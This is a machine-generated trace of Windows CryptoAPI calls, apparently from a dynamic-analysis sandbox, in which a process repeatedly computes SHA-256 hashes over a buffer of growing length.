	[0250.455] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.456] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.456] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0250.456] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.456] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3820
	[0250.456] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3820, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3820, pdwDataLen=0x128c3c) returned 1
	[0250.456] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.456] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.456] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.456] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.456] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0250.456] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.456] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3848
	[0250.456] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3848, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3848, pdwDataLen=0x128c3c) returned 1
	[0250.456] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.456] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.456] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.457] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.457] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0250.457] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.457] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3870
	[0250.457] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3870, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3870, pdwDataLen=0x128c3c) returned 1
	[0250.457] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.457] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.457] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.457] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.457] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0250.457] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.457] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3898
	[0250.457] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3898, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3898, pdwDataLen=0x128c3c) returned 1
	[0250.457] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.457] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.457] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.458] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.458] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0250.458] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.458] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c38c0
	[0250.458] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c38c0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c38c0, pdwDataLen=0x128c3c) returned 1
	[0250.458] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.458] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.458] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.458] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.458] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0250.458] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.459] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c38e8
	[0250.459] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c38e8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c38e8, pdwDataLen=0x128c3c) returned 1
	[0250.459] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.459] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.459] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.459] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.459] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0250.459] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.459] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3910
	[0250.459] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3910, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3910, pdwDataLen=0x128c3c) returned 1
	[0250.459] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.459] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.459] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.459] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.459] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0250.460] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.460] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3938
	[0250.460] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3938, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3938, pdwDataLen=0x128c3c) returned 1
	[0250.460] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.460] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.460] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.460] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.460] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0250.460] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.460] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3960
	[0250.460] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3960, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3960, pdwDataLen=0x128c3c) returned 1
	[0250.460] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.460] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.460] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.460] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.460] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0250.461] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.461] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3988
	[0250.461] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3988, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3988, pdwDataLen=0x128c3c) returned 1
	[0250.461] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.461] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.461] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.461] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.461] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0250.461] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.461] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c39b0
	[0250.461] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c39b0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c39b0, pdwDataLen=0x128c3c) returned 1
	[0250.461] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.461] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.461] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.461] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.461] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0250.462] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.462] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c39d8
	[0250.462] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c39d8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c39d8, pdwDataLen=0x128c3c) returned 1
	[0250.462] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.462] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.462] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.462] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.462] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0250.462] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.462] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3a00
	[0250.462] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3a00, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3a00, pdwDataLen=0x128c3c) returned 1
	[0250.462] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.462] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.462] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.462] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.462] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0250.463] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.463] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3a28
	[0250.463] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3a28, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3a28, pdwDataLen=0x128c3c) returned 1
	[0250.463] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.463] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.463] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.463] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.463] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0250.463] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.463] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3a50
	[0250.463] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3a50, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3a50, pdwDataLen=0x128c3c) returned 1
	[0250.463] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.463] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.463] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.463] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.463] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0250.464] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.464] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3a78
	[0250.464] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3a78, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3a78, pdwDataLen=0x128c3c) returned 1
	[0250.464] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.464] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.464] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.464] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.464] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0250.464] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.464] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3aa0
	[0250.464] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3aa0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3aa0, pdwDataLen=0x128c3c) returned 1
	[0250.464] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.464] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.464] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.464] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.464] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0250.465] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.465] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3ac8
	[0250.465] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3ac8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3ac8, pdwDataLen=0x128c3c) returned 1
	[0250.465] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.465] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.465] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.465] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.465] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0250.465] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.465] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3af0
	[0250.465] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3af0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3af0, pdwDataLen=0x128c3c) returned 1
	[0250.465] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.465] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.465] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.465] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.466] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0250.466] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.466] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3b18
	[0250.466] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3b18, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3b18, pdwDataLen=0x128c3c) returned 1
	[0250.466] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.466] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.466] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.466] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.466] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0250.466] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.466] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3b40
	[0250.466] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3b40, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3b40, pdwDataLen=0x128c3c) returned 1
	[0250.466] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.466] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.466] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.466] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.467] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0250.467] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.467] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3b68
	[0250.467] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3b68, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3b68, pdwDataLen=0x128c3c) returned 1
	[0250.467] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.467] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.467] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.467] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.467] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0250.467] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.467] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3b90
	[0250.467] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3b90, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3b90, pdwDataLen=0x128c3c) returned 1
	[0250.467] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.467] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.467] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.467] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.468] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0250.468] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.468] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3bb8
	[0250.468] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3bb8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3bb8, pdwDataLen=0x128c3c) returned 1
	[0250.468] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.468] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.468] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.468] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.468] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0250.468] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.468] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3be0
	[0250.468] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3be0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3be0, pdwDataLen=0x128c3c) returned 1
	[0250.468] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.468] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
